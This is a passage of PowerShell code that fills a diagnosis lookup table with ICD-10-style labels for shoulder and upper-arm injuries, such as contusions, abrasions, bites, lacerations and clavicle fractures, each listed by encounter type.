sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right shoulder","Contusion of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right shoulder","Contusion of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right shoulder","Contusion of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left shoulder","Contusion of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left shoulder","Contusion of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left shoulder","Contusion of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified shoulder","Contusion of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified shoulder","Contusion of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified shoulder","Contusion of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right upper arm","Contusion of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right upper arm","Contusion of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right upper arm","Contusion of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left upper arm","Contusion of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left upper arm","Contusion of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left upper arm","Contusion of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified upper arm","Contusion of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified upper arm","Contusion of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified upper arm","Contusion of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right shoulder","Abrasion of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right shoulder","Abrasion of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right shoulder","Abrasion of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left shoulder","Abrasion of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left shoulder","Abrasion of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left shoulder","Abrasion of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified shoulder","Abrasion of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified shoulder","Abrasion of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified shoulder","Abrasion of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right shoulder","Blister (nonthermal) of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right shoulder","Blister (nonthermal) of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right shoulder","Blister (nonthermal) of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left shoulder","Blister (nonthermal) of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left shoulder","Blister (nonthermal) of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left shoulder","Blister (nonthermal) of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified shoulder","Blister (nonthermal) of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified shoulder","Blister (nonthermal) of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified shoulder","Blister (nonthermal) of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right shoulder","External constriction of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right shoulder","External constriction of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right shoulder","External constriction of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left shoulder","External constriction of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left shoulder","External constriction of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left shoulder","External constriction of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified shoulder","External constriction of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified shoulder","External constriction of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified shoulder","External constriction of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right shoulder","Superficial foreign body of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right shoulder","Superficial foreign body of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right shoulder","Superficial foreign body of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left shoulder","Superficial foreign body of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left shoulder","Superficial foreign body of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left shoulder","Superficial foreign body of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified shoulder","Superficial foreign body of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified shoulder","Superficial foreign body of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified shoulder","Superficial foreign body of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right shoulder","Insect bite (nonvenomous) of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right shoulder","Insect bite (nonvenomous) of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right shoulder","Insect bite (nonvenomous) of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left shoulder","Insect bite (nonvenomous) of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left shoulder","Insect bite (nonvenomous) of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left shoulder","Insect bite (nonvenomous) of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified shoulder","Insect bite (nonvenomous) of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified shoulder","Insect bite (nonvenomous) of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified shoulder","Insect bite (nonvenomous) of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right shoulder","Other superficial bite of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right shoulder","Other superficial bite of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right shoulder","Other superficial bite of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left shoulder","Other superficial bite of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left shoulder","Other superficial bite of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left shoulder","Other superficial bite of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified shoulder","Other superficial bite of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified shoulder","Other superficial bite of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified shoulder","Other superficial bite of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right upper arm","Abrasion of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right upper arm","Abrasion of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right upper arm","Abrasion of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left upper arm","Abrasion of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left upper arm","Abrasion of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left upper arm","Abrasion of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified upper arm","Abrasion of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified upper arm","Abrasion of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified upper arm","Abrasion of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right upper arm","Blister (nonthermal) of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right upper arm","Blister (nonthermal) of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right upper arm","Blister (nonthermal) of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left upper arm","Blister (nonthermal) of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left upper arm","Blister (nonthermal) of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left upper arm","Blister (nonthermal) of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified upper arm","Blister (nonthermal) of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified upper arm","Blister (nonthermal) of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified upper arm","Blister (nonthermal) of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right upper arm","External constriction of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right upper arm","External constriction of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right upper arm","External constriction of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left upper arm","External constriction of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left upper arm","External constriction of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left upper arm","External constriction of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified upper arm","External constriction of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified upper arm","External constriction of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified upper arm","External constriction of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right upper arm","Superficial foreign body of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right upper arm","Superficial foreign body of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right upper arm","Superficial foreign body of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left upper arm","Superficial foreign body of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left upper arm","Superficial foreign body of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left upper arm","Superficial foreign body of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified upper arm","Superficial foreign body of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified upper arm","Superficial foreign body of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified upper arm","Superficial foreign body of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right upper arm","Insect bite (nonvenomous) of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right upper arm","Insect bite (nonvenomous) of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right upper arm","Insect bite (nonvenomous) of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left upper arm","Insect bite (nonvenomous) of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left upper arm","Insect bite (nonvenomous) of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left upper arm","Insect bite (nonvenomous) of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified upper arm","Insect bite (nonvenomous) of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified upper arm","Insect bite (nonvenomous) of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified upper arm","Insect bite (nonvenomous) of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right upper arm","Other superficial bite of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right upper arm","Other superficial bite of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right upper arm","Other superficial bite of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left upper arm","Other superficial bite of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left upper arm","Other superficial bite of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left upper arm","Other superficial bite of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified upper arm","Other superficial bite of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified upper arm","Other superficial bite of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified upper arm","Other superficial bite of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right shoulder","Unspecified superficial injury of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right shoulder","Unspecified superficial injury of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right shoulder","Unspecified superficial injury of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left shoulder","Unspecified superficial injury of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left shoulder","Unspecified superficial injury of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left shoulder","Unspecified superficial injury of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified shoulder","Unspecified superficial injury of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified shoulder","Unspecified superficial injury of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified shoulder","Unspecified superficial injury of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right upper arm","Unspecified superficial injury of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right upper arm","Unspecified superficial injury of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right upper arm","Unspecified superficial injury of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left upper arm","Unspecified superficial injury of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left upper arm","Unspecified superficial injury of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left upper arm","Unspecified superficial injury of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified upper arm","Unspecified superficial injury of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified upper arm","Unspecified superficial injury of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified upper arm","Unspecified superficial injury of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right shoulder","Unspecified open wound of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right shoulder","Unspecified open wound of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right shoulder","Unspecified open wound of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left shoulder","Unspecified open wound of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left shoulder","Unspecified open wound of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left shoulder","Unspecified open wound of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified shoulder","Unspecified open wound of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified shoulder","Unspecified open wound of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified shoulder","Unspecified open wound of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right shoulder","Laceration without foreign body of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right shoulder","Laceration without foreign body of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right shoulder","Laceration without foreign body of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left shoulder","Laceration without foreign body of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left shoulder","Laceration without foreign body of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left shoulder","Laceration without foreign body of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified shoulder","Laceration without foreign body of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified shoulder","Laceration without foreign body of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified shoulder","Laceration without foreign body of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right shoulder","Laceration with foreign body of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right shoulder","Laceration with foreign body of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right shoulder","Laceration with foreign body of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left shoulder","Laceration with foreign body of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left shoulder","Laceration with foreign body of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left shoulder","Laceration with foreign body of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified shoulder","Laceration with foreign body of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified shoulder","Laceration with foreign body of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified shoulder","Laceration with foreign body of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right shoulder","Puncture wound without foreign body of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right shoulder","Puncture wound without foreign body of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right shoulder","Puncture wound without foreign body of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left shoulder","Puncture wound without foreign body of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left shoulder","Puncture wound without foreign body of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left shoulder","Puncture wound without foreign body of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified shoulder","Puncture wound without foreign body of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified shoulder","Puncture wound without foreign body of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified shoulder","Puncture wound without foreign body of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right shoulder","Puncture wound with foreign body of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right shoulder","Puncture wound with foreign body of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right shoulder","Puncture wound with foreign body of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left shoulder","Puncture wound with foreign body of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left shoulder","Puncture wound with foreign body of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left shoulder","Puncture wound with foreign body of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified shoulder","Puncture wound with foreign body of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified shoulder","Puncture wound with foreign body of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified shoulder","Puncture wound with foreign body of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right shoulder","Open bite of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right shoulder","Open bite of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right shoulder","Open bite of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left shoulder","Open bite of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left shoulder","Open bite of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left shoulder","Open bite of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified shoulder","Open bite of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified shoulder","Open bite of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified shoulder","Open bite of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right upper arm","Unspecified open wound of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right upper arm","Unspecified open wound of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right upper arm","Unspecified open wound of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left upper arm","Unspecified open wound of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left upper arm","Unspecified open wound of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left upper arm","Unspecified open wound of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified upper arm","Unspecified open wound of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified upper arm","Unspecified open wound of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified upper arm","Unspecified open wound of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right upper arm","Laceration without foreign body of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right upper arm","Laceration without foreign body of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right upper arm","Laceration without foreign body of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left upper arm","Laceration without foreign body of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left upper arm","Laceration without foreign body of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left upper arm","Laceration without foreign body of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified upper arm","Laceration without foreign body of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified upper arm","Laceration without foreign body of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified upper arm","Laceration without foreign body of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right upper arm","Laceration with foreign body of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right upper arm","Laceration with foreign body of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right upper arm","Laceration with foreign body of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left upper arm","Laceration with foreign body of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left upper arm","Laceration with foreign body of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left upper arm","Laceration with foreign body of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified upper arm","Laceration with foreign body of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified upper arm","Laceration with foreign body of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified upper arm","Laceration with foreign body of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right upper arm","Puncture wound without foreign body of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right upper arm","Puncture wound without foreign body of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right upper arm","Puncture wound without foreign body of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left upper arm","Puncture wound without foreign body of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left upper arm","Puncture wound without foreign body of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left upper arm","Puncture wound without foreign body of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified upper arm","Puncture wound without foreign body of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified upper arm","Puncture wound without foreign body of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified upper arm","Puncture wound without foreign body of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right upper arm","Puncture wound with foreign body of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right upper arm","Puncture wound with foreign body of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right upper arm","Puncture wound with foreign body of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left upper arm","Puncture wound with foreign body of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left upper arm","Puncture wound with foreign body of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left upper arm","Puncture wound with foreign body of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified upper arm","Puncture wound with foreign body of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified upper arm","Puncture wound with foreign body of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified upper arm","Puncture wound with foreign body of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right upper arm","Open bite of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right upper arm","Open bite of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right upper arm","Open bite of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left upper arm","Open bite of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left upper arm","Open bite of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left upper arm","Open bite of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified upper arm","Open bite of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified upper arm","Open bite of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified upper arm","Open bite of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, subsequent encounter for fracture with 